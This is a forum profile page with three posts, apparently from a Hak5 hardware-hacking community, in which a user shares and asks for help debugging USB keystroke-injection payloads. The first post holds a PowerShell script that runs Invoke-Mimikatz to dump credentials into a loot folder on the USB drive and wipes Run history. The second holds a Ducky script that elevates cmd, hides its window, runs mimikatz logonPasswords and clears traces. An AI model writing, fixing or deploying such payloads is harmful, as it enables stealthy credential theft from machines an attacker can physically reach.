bananacake

Members, 3 posts
Everything posted by bananacake

  1. Thanks for such a quick reply :D Send me your bitcoin address or PayPal in a PM for a little donation. I had already been fiddling with run.ps1 before your post. Unfortunately, no luck so far. I added mimikatz.ps1 to the payloads folder (https://github.com/clymb3r/PowerShell/blob/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1). I have made the following changes to run.ps1:

     #Remove run history
     powershell "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue"

     #Get the path and file name that you are using for output
     # find connected bashbunny drive:
     $VolumeName = "DUCKY"
     $computerSystem = Get-CimInstance CIM_ComputerSystem
     $backupDrive = $null
     get-wmiobject win32_logicaldisk | % {
         if ($_.VolumeName -eq $VolumeName) {
             $backupDrive = $_.DeviceID
         }
     }

     #See if a loot folder exists on the USB. If not, create one
     $TARGETDIR = $backupDrive + "\loot"
     if(!(Test-Path -Path $TARGETDIR )){
         New-Item -ItemType directory -Path $TARGETDIR
     }

     #See if an info folder exists in the loot folder. If not, create one
     $TARGETDIR = $backupDrive + "\loot\info"
     if(!(Test-Path -Path $TARGETDIR )){
         New-Item -ItemType directory -Path $TARGETDIR
     }

     #See if a passwords folder exists in the loot folder. If not, create one
     $TARGETDIR = $backupDrive + "\loot\passwords"
     if(!(Test-Path -Path $TARGETDIR )){
         New-Item -ItemType directory -Path $TARGETDIR
     }

     #Create a path that will be used to make the file
     $datetime = get-date -f yyyy-MM-dd_HH-mm
     $backupPath = $backupDrive + "\loot\info\" + $computerSystem.Name + " - " + $datetime + ".txt"
     $passwordPath = $backupDrive + "\loot\passwords\" + "passwords" + ".txt"

     #Create output from info script
     $TARGETDIR = $MyInvocation.MyCommand.Path
     $TARGETDIR = $TARGETDIR -replace ".......$"
     cd $TARGETDIR
     PowerShell.exe -ExecutionPolicy Bypass -File info.ps1 > $backupPath
     PowerShell.exe -ExecutionPolicy Bypass -File mimikatz.ps1 -DumpCerts >> $passwordPath

     When I run run.ps1, info.ps1 executes correctly as usual; afterwards a new PowerShell window is opened and a passwords folder is created along with a passwords.txt file. However, the passwords.txt file is empty. I'm pretty sure mimikatz is running, as my cursor displays a loading timer icon; it's just not outputting the file correctly, and I'm not sure exactly what to do to fix this. Any help is appreciated. Thank you.
  2. Thanks a bunch SnowMonster. This script is excellent and works perfectly. I wonder if it would be possible to add mimikatz to the payload after the information gathering stage. Other mimikatz payloads first start cmd.exe as admin before executing mimikatz through PowerShell commands. For example:

     DELAY 2000
     GUI r
     DELAY 500
     STRING powershell Start-Process cmd.exe -verb runAs
     ENTER
     DELAY 2000
     ALT y
     DELAY 500
     CTRL C
     REM *** Obfuscate the command prompt ***
     STRING mode con:cols=18 lines=1
     ENTER
     STRING color FE
     ENTER
     REM *** Define Ducky Drive as DUCK ***
     STRING for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set duck=%d
     ENTER
     DELAY 500
     REM *** Run Mimikatz from Ducky Drive ***
     STRING powershell %duck%\im.ps1 -DumpCreds >> %duck%\%computername%-passwords.txt
     ENTER
     DELAY 100
     STRING privilege::debug
     ENTER
     STRING sekurlsa::logonPasswords full
     ENTER
     DELAY 10000
     STRING exit
     ENTER
     DELAY 5000
     REM *** Clear duck variable, history, and GTFO ***
     STRING set "duck="
     ENTER
     DELAY 100
     STRING powershell "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue"
     ENTER
     DELAY 100
     STRING color 08
     ENTER
     DELAY 100
     STRING exit
     ENTER

     As you can see, this is slower than simply executing several pre-made PowerShell files and requires an admin cmd to start (which may be restricted in corporate environments). I am wondering if it is possible to cut this stage out entirely and create a payload similar to your information gathering payload? Thanks again.
  3. Your old GitHub links don't work. Mind sharing your new tweaked payload again? Thank you.